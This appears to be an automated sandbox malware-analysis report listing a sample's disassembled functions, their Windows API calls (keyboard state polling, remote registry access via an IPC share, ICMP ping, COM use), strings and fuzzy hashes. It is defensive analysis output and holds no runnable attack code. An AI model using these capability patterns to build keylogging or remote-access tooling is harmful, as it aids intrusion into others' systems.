                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: SendString$_wcslen
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2420728520-1007645807
                        • Opcode ID: c3146e287ca4018259a278094615055f4312c80f4be5afce83f8ea235c8a129f
                        • Instruction ID: db2026191a91c121b60de6150c08a35b8678bb04d3415c5f4e391984275b7b74
                        • Opcode Fuzzy Hash: c3146e287ca4018259a278094615055f4312c80f4be5afce83f8ea235c8a129f
                        • Instruction Fuzzy Hash: F0115135A9026979D721B7A2DC4AEFF6A7CFBD2F00F440829B411A21D1EAB00E05C6B1
                        Function 009E5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 009E5CE2
                        • GetWindowRect.USER32(00000000,?), ref: 009E5CFB
                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009E5D59
                        • GetDlgItem.USER32(?,00000002), ref: 009E5D69
                        • GetWindowRect.USER32(00000000,?), ref: 009E5D7B
                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009E5DCF
                        • GetDlgItem.USER32(?,000003E9), ref: 009E5DDD
                        • GetWindowRect.USER32(00000000,?), ref: 009E5DEF
                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 009E5E31
                        • GetDlgItem.USER32(?,000003EA), ref: 009E5E44
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009E5E5A
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 009E5E67
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: f6d8c478b88f8c11b01f32e1ee66d094d3974110102987a9f16a0a33e34a5c9d
                        • Instruction ID: 43a9ee7e8bb19f313d2f21c8292ab9fe8956b7242fd428e94b68206a009e59e5
                        • Opcode Fuzzy Hash: f6d8c478b88f8c11b01f32e1ee66d094d3974110102987a9f16a0a33e34a5c9d
                        • Instruction Fuzzy Hash: 4D513F70B40605AFDF19CFA9CD89AAEBBB9FB48314F158129F515E7290D7709E01CB50
                        Function 00998BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00998F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00998BE8,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 00998FC5
                        • DestroyWindow.USER32(?), ref: 00998C81
                        • KillTimer.USER32(00000000,?,?,?,?,00998BBA,00000000,?), ref: 00998D1B
                        • DestroyAcceleratorTable.USER32(00000000), ref: 009D6973
                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 009D69A1
                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 009D69B8
                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000), ref: 009D69D4
                        • DeleteObject.GDI32(00000000), ref: 009D69E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: 29c58d553560ba4ef579a6560a0f93492ada902c3360fdaa2657cde9da7f5f34
                        • Instruction ID: 94d8658e2edee96434ca6418f57cc028799c91799d93891b761d5bf4cf7b1ca6
                        • Opcode Fuzzy Hash: 29c58d553560ba4ef579a6560a0f93492ada902c3360fdaa2657cde9da7f5f34
                        • Instruction Fuzzy Hash: BF618C30542700DFCF21DF68D958B6677F5FB46322F14891DE0829BAA0CB75AD82CB90
                        Function 00999838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952
                        • GetSysColor.USER32(0000000F), ref: 00999862
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: 568aedb42fd55e67d02bcc3c8abb1a81a81f19fcd36d7ac1b5b70943f8e7ce73
                        • Instruction ID: d8d1cb61fc482593b7fa11613809798e24e5af32cec93454e98f0e1e6c16a6c1
                        • Opcode Fuzzy Hash: 568aedb42fd55e67d02bcc3c8abb1a81a81f19fcd36d7ac1b5b70943f8e7ce73
                        • Instruction Fuzzy Hash: 9641A231184644AFDF209F7D9C84BB97BA9EB06331F14861DF9A2872E1E7319C42DB11
                        Function 009E96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,009CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 009E9717
                        • LoadStringW.USER32(00000000,?,009CF7F8,00000001), ref: 009E9720
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,009CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 009E9742
                        • LoadStringW.USER32(00000000,?,009CF7F8,00000001), ref: 009E9745
                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 009E9866
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wcslen
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 747408836-2268648507
                        • Opcode ID: e83e947701c053a1d6a02ab7f0ac245fcbc213cef0bf39edccd8d5e9996dc979
                        • Instruction ID: b877b8417d437cba88526e2232883d1efcbcc70a7341fb3742da76f933e25d4f
                        • Opcode Fuzzy Hash: e83e947701c053a1d6a02ab7f0ac245fcbc213cef0bf39edccd8d5e9996dc979
                        • Instruction Fuzzy Hash: 61414A72800219AACF05FBE0DE86FEEB378AF95740F544425F60672192EB356F49CB61
                        Function 009E06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009E07A2
                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009E07BE
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009E07DA
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009E0804
                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 009E082C
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009E0837
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009E083C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 323675364-22481851
                        • Opcode ID: ce0dbdef4aefe04e71b1925b7021613f8559c0586b249f485c5cc90c90d919ff
                        • Instruction ID: 2289581e63af4284ae35537f5a53853afa039205c943463dc52f29400e720fbe
                        • Opcode Fuzzy Hash: ce0dbdef4aefe04e71b1925b7021613f8559c0586b249f485c5cc90c90d919ff
                        • Instruction Fuzzy Hash: 2E411672C10229ABDF15EBA4DC85DEDB778FF84750B04812AE901A3261EB759E45CBA0
                        Function 00A03C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00A03C5C
                        • CoInitialize.OLE32(00000000), ref: 00A03C8A
                        • CoUninitialize.OLE32 ref: 00A03C94
                        • _wcslen.LIBCMT ref: 00A03D2D
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00A03DB1
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A03ED5
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A03F0E
                        • CoGetObject.OLE32(?,00000000,00A1FB98,?), ref: 00A03F2D
                        • SetErrorMode.KERNEL32(00000000), ref: 00A03F40
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A03FC4
                        • VariantClear.OLEAUT32(?), ref: 00A03FD8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                        • String ID:
                        • API String ID: 429561992-0
                        • Opcode ID: b788cc6dc9bc3fb79aa8e92a3c7793ed0a4c23b7b77457bd3e4468a942e756c3
                        • Instruction ID: c17aae0b99b0c5e701a5d56b200bb1a82bd93c5648605c5969027ceb93b688af
                        • Opcode Fuzzy Hash: b788cc6dc9bc3fb79aa8e92a3c7793ed0a4c23b7b77457bd3e4468a942e756c3
                        • Instruction Fuzzy Hash: 04C15772608309AFDB00DF68D88492BB7E9FF89744F04491DF98A9B291D730ED05CB52
                        Function 009F7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 009F7AF3
                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009F7B8F
                        • SHGetDesktopFolder.SHELL32(?), ref: 009F7BA3
                        • CoCreateInstance.OLE32(00A1FD08,00000000,00000001,00A46E6C,?), ref: 009F7BEF
                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009F7C74
                        • CoTaskMemFree.OLE32(?,?), ref: 009F7CCC
                        • SHBrowseForFolderW.SHELL32(?), ref: 009F7D57
                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009F7D7A
                        • CoTaskMemFree.OLE32(00000000), ref: 009F7D81
                        • CoTaskMemFree.OLE32(00000000), ref: 009F7DD6
                        • CoUninitialize.OLE32 ref: 009F7DDC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                        • String ID:
                        • API String ID: 2762341140-0
                        • Opcode ID: e174c0e05325215e03fe5b553ccd3193d90827672ffe6afe9c182444e3857665
                        • Instruction ID: 390d12ba7295807c54e6ff43e2258a7a548e0dc3e61cb15c5d30c25783892004
                        • Opcode Fuzzy Hash: e174c0e05325215e03fe5b553ccd3193d90827672ffe6afe9c182444e3857665
                        • Instruction Fuzzy Hash: B7C11A75A04109AFCB14DFA4C888DAEBBF9FF48314B148499F9199B361D731EE41CB90
                        Function 00A1541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A15504
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A15515
                        • CharNextW.USER32(00000158), ref: 00A15544
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A15585
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A1559B
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A155AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$CharNext
                        • String ID:
                        • API String ID: 1350042424-0
                        • Opcode ID: 46ee4fc730b3a3bb779feda293caa44433a1b429c75ff4b0b4b78541cfc35ae6
                        • Instruction ID: fddbe86be4a564d83cfad50fad892a660e80813514180fe1e9b1f0bede1754cc
                        • Opcode Fuzzy Hash: 46ee4fc730b3a3bb779feda293caa44433a1b429c75ff4b0b4b78541cfc35ae6
                        • Instruction Fuzzy Hash: FC616E35D00608EFDF10DFA4CC84AFE7BBAEB89721F108145F525A6291D7748AC1DB61
                        Function 009DFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009DFAAF
                        • SafeArrayAllocData.OLEAUT32(?), ref: 009DFB08
                        • VariantInit.OLEAUT32(?), ref: 009DFB1A
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 009DFB3A
                        • VariantCopy.OLEAUT32(?,?), ref: 009DFB8D
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 009DFBA1
                        • VariantClear.OLEAUT32(?), ref: 009DFBB6
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 009DFBC3
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009DFBCC
                        • VariantClear.OLEAUT32(?), ref: 009DFBDE
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009DFBE9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: 1173c39d38197ec49e25e693f7b84974861fe9d3d8230a79a542ff8eeca6c150
                        • Instruction ID: 540fcdd8f7b0ee8c31a69b6a4fe30a1eb97c559035c064be39bdc9285df35abd
                        • Opcode Fuzzy Hash: 1173c39d38197ec49e25e693f7b84974861fe9d3d8230a79a542ff8eeca6c150
                        • Instruction Fuzzy Hash: 92418234A402199FCB00DFA4D8699EDBBB9EF48354F00C06AE946A7361D734A946CBA0
                        Function 009E9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 009E9CA1
                        • GetAsyncKeyState.USER32(000000A0), ref: 009E9D22
                        • GetKeyState.USER32(000000A0), ref: 009E9D3D
                        • GetAsyncKeyState.USER32(000000A1), ref: 009E9D57
                        • GetKeyState.USER32(000000A1), ref: 009E9D6C
                        • GetAsyncKeyState.USER32(00000011), ref: 009E9D84
                        • GetKeyState.USER32(00000011), ref: 009E9D96
                        • GetAsyncKeyState.USER32(00000012), ref: 009E9DAE
                        • GetKeyState.USER32(00000012), ref: 009E9DC0
                        • GetAsyncKeyState.USER32(0000005B), ref: 009E9DD8
                        • GetKeyState.USER32(0000005B), ref: 009E9DEA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: b13ca49ce3e08dd3eae63caf0cfd25443ce94bf71743c04508f3749c72982679
                        • Instruction ID: c68b190ea5fcb9eb45a6b8218c152d89eff3dc8db348edf9e5e8e3bd646d95d6
                        • Opcode Fuzzy Hash: b13ca49ce3e08dd3eae63caf0cfd25443ce94bf71743c04508f3749c72982679
                        • Instruction Fuzzy Hash: EB41F8345047D96DFF3297A288043F5BEE96F12354F08805EDAC65A5C2DBA49DC8C7A2
                        Function 00A0055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 00A005BC
                        • inet_addr.WSOCK32(?), ref: 00A0061C
                        • gethostbyname.WSOCK32(?), ref: 00A00628
                        • IcmpCreateFile.IPHLPAPI ref: 00A00636
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A006C6
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A006E5
                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00A007B9
                        • WSACleanup.WSOCK32 ref: 00A007BF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        • Opcode ID: 32f365fccf586b137e2d00f24e0ffb8faf309a5dc00bb1a9a5da097951ea085d
                        • Instruction ID: 5e9dc7fcf59806ff07438a112f1f6f509ca498df5c1fc3b529be1be2b915101c
                        • Opcode Fuzzy Hash: 32f365fccf586b137e2d00f24e0ffb8faf309a5dc00bb1a9a5da097951ea085d
                        • Instruction Fuzzy Hash: B591CF34608601AFD720DF15E888F1ABBE0AF89318F1485A9F4698B7A2C775FD45CF91
                        Function 00A08CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharLower
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 707087890-567219261
                        • Opcode ID: 152c03bdc409207acf6958af47773b0fea71b8fedafacfdc43f92e59362b10e8
                        • Instruction ID: 2c887a9f4359ae9c4d08156323146892a3a4234ed70ad14d89e826a76e1695f5
                        • Opcode Fuzzy Hash: 152c03bdc409207acf6958af47773b0fea71b8fedafacfdc43f92e59362b10e8
                        • Instruction Fuzzy Hash: 2751C131A0051A9BCF14DF68D9409BEB7A6BFA5720B214229E8A6E73C4DB38DD40C794
                        Function 00A0372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32 ref: 00A03774
                        • CoUninitialize.OLE32 ref: 00A0377F
                        • CoCreateInstance.OLE32(?,00000000,00000017,00A1FB78,?), ref: 00A037D9
                        • IIDFromString.OLE32(?,?), ref: 00A0384C
                        • VariantInit.OLEAUT32(?), ref: 00A038E4
                        • VariantClear.OLEAUT32(?), ref: 00A03936
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 636576611-1287834457
                        • Opcode ID: 5c0a238cccc4db89f953fd40f26952d8578efd5265a510046a23ffe32db1ad21
                        • Instruction ID: ed8cfc3e1234fdf1d8b802208e8b42d7c63c21ad448d82c23ed4abc4b147e309
                        • Opcode Fuzzy Hash: 5c0a238cccc4db89f953fd40f26952d8578efd5265a510046a23ffe32db1ad21
                        • Instruction Fuzzy Hash: 1761CF72608305AFDB11DF54D888F6ABBE8FF88710F104849F9859B291D770EE48CB92
                        Function 009F3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009F33CF
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009F33F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
